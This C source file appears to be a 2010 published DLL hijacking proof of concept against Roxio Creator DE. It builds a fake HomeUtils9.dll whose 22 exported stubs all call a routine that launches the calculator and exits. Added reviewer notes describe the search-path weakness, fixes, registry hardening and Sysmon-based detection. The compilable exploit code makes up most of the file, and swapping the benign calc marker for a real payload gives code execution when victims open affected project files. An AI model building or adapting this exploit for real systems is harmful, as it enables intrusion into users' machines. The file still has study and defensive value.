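/*
 * Exploit Title: Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)
 * Date:          August 25, 2010
 * Author:        storm (storm@gonullyourself.org)
 * Version:       9.0.116 - Other versions are very possibly exploitable too
 * Tested on:     Windows Vista SP2
 *
 * http://www.gonullyourself.org/
 *
 * gcc -shared -o HomeUtils9.dll Roxio-DLL.c
 *
 * .c2d, .gi, and .roxio files are affected.
 */

/*
 * Reviewer notes (defensive context):
 *
 * - Weakness class: uncontrolled search path element (CWE-427). The listing
 *   only makes sense if the host application loads HomeUtils9.dll by bare
 *   name rather than by a fully qualified path; the loader call itself is
 *   not shown on this page, so treat that as inferred.
 * - Fix on the application side: load the library by absolute path, or
 *   restrict the search order early in process start-up with
 *   SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32) or
 *   SetDllDirectory(""), and verify the signature of what gets loaded.
 * - Host hardening: the CWDIllegalInDllSearch registry setting removes the
 *   current working directory from the DLL search order for applications
 *   that cannot be patched.
 * - Detection: alert on image-load events (for example Sysmon event ID 7)
 *   where HomeUtils9.dll is mapped from any directory other than the
 *   product's install directory, or where the module is unsigned.
 */

/*
 * The header name after #include was lost when this listing was extracted.
 * WinExec() is declared by <windows.h> and exit() by <stdlib.h>.
 */
#include <windows.h>
#include <stdlib.h>

#define DllExport __declspec (dllexport)

/*
 * Declared ahead of the stubs: the original called hax() before any
 * declaration was visible, which relies on implicit function declarations
 * (removed from the language in C99 and rejected by current compilers).
 */
int hax(void);

/*
 * Export stubs. Each one carries a name the host is expected to import from
 * HomeUtils9.dll, and every stub funnels into hax(), so whichever import the
 * host calls first reaches the same routine. The real prototypes are not
 * shown on this page; the stubs take no arguments and return nothing.
 */
DllExport void Dispatch_InvokeUpdate() { hax(); }
DllExport void GetCertificateItemValue() { hax(); }
DllExport void GetFeatureEnabled() { hax(); }
DllExport void GetFeatureEnabledGroup() { hax(); }
DllExport void GetFeatureGroup() { hax(); }
DllExport void GetFeatureGroupActivationDetail() { hax(); }
DllExport void GetRoxioKeyContents() { hax(); }
DllExport void LaunchPermission() { hax(); }
DllExport void LaunchPermission_Str() { hax(); }
DllExport void SAR_Dispatch_ActivateComponent() { hax(); }
DllExport void SAR_Dispatch_ActivateProduct() { hax(); }
DllExport void SAR_Dispatch_ActivateProductGroup() { hax(); }
DllExport void SAR_Dispatch_DoRegister() { hax(); }
DllExport void SAR_Dispatch_GetActivationDetail() { hax(); }
DllExport void SAR_Dispatch_IncrementUsage() { hax(); }
DllExport void SAR_Dispatch_IsActivated() { hax(); }
DllExport void SAR_Dispatch_IsRegistered() { hax(); }
DllExport void SAR_Dispatch_ReleaseActivation() { hax(); }
DllExport void SAR_GetCDKey() { hax(); }
DllExport void SAR_UsePermissionsCache() { hax(); }
DllExport void Upgrade() { hax(); }
DllExport void UseCodecPermission() { hax(); }

/*
 * Proof-of-execution marker: starts the Windows calculator to show that
 * code from this library ran inside the host process, then ends that
 * process with exit status 0.
 *
 * Returns: nominally 0, but exit() does not return, so the return statement
 * is never reached.
 */
int hax(void)
{
    /* Second argument is WinExec's uCmdShow value; 0 is passed as on the original page. */
    WinExec("calc", 0);
    exit(0);
    return 0;
}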